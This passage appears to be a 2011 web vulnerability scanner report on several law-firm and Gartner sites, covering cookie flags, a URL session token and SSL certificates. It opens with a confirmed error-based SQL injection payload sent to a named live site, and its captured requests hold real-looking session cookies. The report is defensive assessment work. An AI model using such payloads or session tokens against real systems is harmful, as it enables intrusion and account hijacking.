The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Host: www.mccarter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 18:28:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4176

<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
   body {font-family:"Verdana";font-weight:normal
...[SNIP]...
11. SSL cookie without secure flag set  previous  next
There are 7 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

11.1. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionOutputs.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://citrix.howardrice.com
Path:   /Citrix/AccessPlatform/auth/clientDetectionOutputs.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Citrix/AccessPlatform/auth/clientDetectionOutputs.aspx HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://citrix.howardrice.com/Citrix/AccessPlatform/clientDetection/finish.aspx
Cookie: WIClientInfo=Cookies_On=true&icaIsPassThrough=0&icaScreenResolution=1920x1200; WINGSession=icaScreenResolution=1920x1200&icaIsPassThrough=0; WIUser=; WINGDevice=; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=; ASP.NET_SessionId=uueo5pjskfoyrrzmidtf44mh
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

RemoteClient=&StreamingClient=

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: /Citrix/AccessPlatform/auth/login.aspx
Set-Cookie: WINGSession=icaScreenResolution=1920x1200&streamingClientDetected=&icaClientAvailable=False&remoteClientDetected=&radeClientAvailable=False&icoLaunchPermitted=False&icaIsPassThrough=0; path=/Citrix/AccessPlatform/; HttpOnly
Set-Cookie: WIUser=NFuse_AppColumns=3&NFuse_ShowFolder=Off&NFuse_ShowDetails=Off&NFuse_LaunchMethod=Ica-Local&NFuse_ShowIcon=On&NFuse_RememberFolder=On&NFuse_AuthMethod=Explicit&NFuse_ForcedClient=Off&NFuse_ShowName=On&NFuse_SilentAuthentication=On; expires=Sat, 12-May-2012 16:14:08 GMT; path=/Citrix/AccessPlatform/; HttpOnly
Set-Cookie: WINGDevice=; expires=Sat, 12-May-2012 16:14:08 GMT; path=/Citrix/AccessPlatform/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fCitrix%2fAccessPlatform%2fauth%2flogin.aspx">here</a>.</h2>
</body></html>
11.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionVariablesForPost.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://citrix.howardrice.com
Path:   /Citrix/AccessPlatform/auth/clientDetectionVariablesForPost.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Citrix/AccessPlatform/auth/clientDetectionVariablesForPost.aspx HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx
Cookie: WIClientInfo=Cookies_On=true&icaIsPassThrough=0&icaScreenResolution=1920x1200; WINGSession=icaScreenResolution=1920x1200&icaIsPassThrough=0; WIUser=; WINGDevice=; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=; ASP.NET_SessionId=uueo5pjskfoyrrzmidtf44mh

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:13:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: WINGSession=icaScreenResolution=1920x1200&icaIsPassThrough=0; path=/Citrix/AccessPlatform/; HttpOnly
Set-Cookie: WIUser=; expires=Sat, 12-May-2012 16:13:58 GMT; path=/Citrix/AccessPlatform/; HttpOnly
Set-Cookie: WINGDevice=; expires=Sat, 12-May-2012 16:13:58 GMT; path=/Citrix/AccessPlatform/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>

<script type="text/javascript">

</script>
</head>
<body>
<form name="
...[SNIP]...
11.3. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://citrix.howardrice.com
Path:   /Citrix/AccessPlatform/auth/login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Citrix/AccessPlatform/auth/login.aspx HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://citrix.howardrice.com/Citrix/AccessPlatform/clientDetection/finish.aspx
Cookie: WIClientInfo=Cookies_On=true&icaIsPassThrough=0&icaScreenResolution=1920x1200; WINGSession=icaScreenResolution=1920x1200&streamingClientDetected=&icaClientAvailable=False&remoteClientDetected=&radeClientAvailable=False&icoLaunchPermitted=False&icaIsPassThrough=0; WIUser=NFuse_AppColumns=3&NFuse_ShowFolder=Off&NFuse_ShowDetails=Off&NFuse_LaunchMethod=Ica-Local&NFuse_ShowIcon=On&NFuse_RememberFolder=On&NFuse_AuthMethod=Explicit&NFuse_ForcedClient=Off&NFuse_ShowName=On&NFuse_SilentAuthentication=On; WINGDevice=; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=; ASP.NET_SessionId=uueo5pjskfoyrrzmidtf44mh

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:14:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Set-Cookie: WINGSession=icaScreenResolution=1920x1200&streamingClientDetected=&remoteClientDetected=&icaClientAvailable=False&radeClientAvailable=False&icaIsPassThrough=0&icoLaunchPermitted=False; path=/Citrix/AccessPlatform/; HttpOnly
Set-Cookie: WIUser=NFuse_ShowFolder=Off&NFuse_AppColumns=3&NFuse_ShowDetails=Off&NFuse_ShowIcon=On&NFuse_LaunchMethod=Ica-Local&NFuse_AuthMethod=Explicit&NFuse_RememberFolder=On&NFuse_ShowName=On&NFuse_ForcedClient=Off&NFuse_SilentAuthentication=On; expires=Sat, 12-May-2012 16:14:11 GMT; path=/Citrix/AccessPlatform/; HttpOnly
Set-Cookie: WINGDevice=; expires=Sat, 12-May-2012 16:14:11 GMT; path=/Citrix/AccessPlatform/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25107


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="ROBOT
...[SNIP]...
11.4. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://citrix.howardrice.com
Path:   /Citrix/AccessPlatform/auth/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Citrix/AccessPlatform/auth/login.aspx HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://citrix.howardrice.com/Citrix/AccessPlatform/
Cookie: __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:13:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ru30t0qng0gbjiqkh0lkkb45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 13456


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<meta NAME="ROBOT
...[SNIP]...
11.5. https://my.gartner.com/portal/server.pt  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.gartner.com
Path:   /portal/server.pt

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/server.pt HTTP/1.1
Host: my.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231879633:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 20:25:35 GMT
Location: https://my.gartner.com/portal/SSOServlet?
Set-Cookie: MY_GARTNER_JSESSIONID=LFB2NMCfl53f2c0p76HT5TP78jMZ7JGb19gP11CbkTjXXLX94GNs!247199090; path=/
Set-Cookie: plloginoccured=false; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
X-PvInfo: [S10203.C10825.A114725.RA0.G5BB6.UCF28D7D9].[OT/html.OG/pages]
Set-Cookie: TSf9d1c9=2eceb1778f7d5a8292d69b6e8f2112fcdf57cbccc2ebf52d4dcc423f; Path=/
Content-Length: 277

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://my.gartner.com/portal/SSOS
...[SNIP]...
11.6. https://www.gartner.com/login/loginInitAction.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.gartner.com
Path:   /login/loginInitAction.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/loginInitAction.do?method=initialize HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231574822:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.2.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Set-Cookie: LoginWLSessionID=3bkJNMQQD2nxnqL2p2zQ93pRLjH08HWLknkhYc1dLHbJfTZfBQKK!421925354; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:19:45 GMT
ETag: "pv88e506d78098b5f6d97f17af119733a5"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.U73FCF567].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 4724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <me
...[SNIP]...
11.7. https://sso.gartner.com/sp/startSSO.ping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.gartner.com
Path:   /sp/startSSO.ping

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sp/startSSO.ping?PartnerIdpId=gartneridp&TARGET=https%3A%2F%2Fmy.gartner.com%3A443%2Fportal%2FSSOServlet%3F HTTP/1.1
Host: sso.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231879633:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: PF=amkidKRQLKUfuBV9NoLdqs;Path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1132


<html>
<head>
   <title>Submit Form</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<noscript>
<p>
<strong>Note:</strong> Since you
...[SNIP]...
12. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /pview?event=pview&publisher=eac76021-5b51-41d1-a137-dc18360b58c0&hostname=www.superlawyers.com&location=%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&url=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&sessionID=1305225339351.66808&fpc=5491d63-12fe57e21d8-9710859-1&ts1305225348465.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=layserfreiwald.com&refQuery=mode%3Dview%26AID%3D8 HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 18:35:49 GMT
Connection: keep-alive

13. SSL certificate  previous  next
There are 9 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

13.1. https://sa-live.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://sa-live.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  sa-live.com
Issued by:  McAfee Public CA v1
Valid from:  Mon Nov 08 15:38:47 CST 2010
Valid to:  Thu Nov 08 15:38:47 CST 2012

Certificate chain #1

Issued to:  McAfee Public CA v1
Issued by:  RSA Security 2048 V3
Valid from:  Wed Mar 17 08:48:23 CDT 2010
Valid to:  Wed Apr 01 09:48:23 CDT 2015

Certificate chain #2

Issued to:  RSA Security 2048 V3
Issued by:  RSA Security 2048 V3
Valid from:  Thu Feb 22 14:39:23 CST 2001
Valid to:  Sun Feb 22 14:39:23 CST 2026
13.2. https://citrix.howardrice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://citrix.howardrice.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  citrix.howardrice.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Fri Oct 01 11:29:08 CDT 2010
Valid to:  Sat Oct 19 16:38:28 CDT 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
13.3. https://client.poynerspruill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  client.poynerspruill.com
Issued by:  Entrust Certification Authority - L1C
Valid from:  Tue Feb 08 22:05:55 CST 2011
Valid to:  Mon Feb 10 04:50:01 CST 2014

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 CST 2009
Valid to:  Tue Dec 10 15:13:54 CST 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 CST 1999
Valid to:  Tue Jul 24 09:15:12 CDT 2029
13.4. https://mail.howardrice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.howardrice.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.howardrice.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Sun Mar 27 02:22:57 CDT 2011
Valid to:  Wed Mar 28 18:01:10 CDT 2012

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022
13.5. https://my.gartner.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.gartner.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  my.gartner.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Oct 20 19:00:00 CDT 2010
Valid to:  Tue Nov 13 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
13.6. https://sso.gartner.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.gartner.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  sso.gartner.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue Nov 23 18:00:00 CST 2010
Valid to:  Thu Nov 24 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
13.7. https://www.gartner.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.gartner.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Oct 19 19:00:00 CDT 2010
Valid to:  Tue Nov 13 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
13.8. https://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 CST 2009
Valid to:  Sun Dec 18 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 19:00:00 CDT 2004
Valid to:  Mon May 12 18:59:59 CDT 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
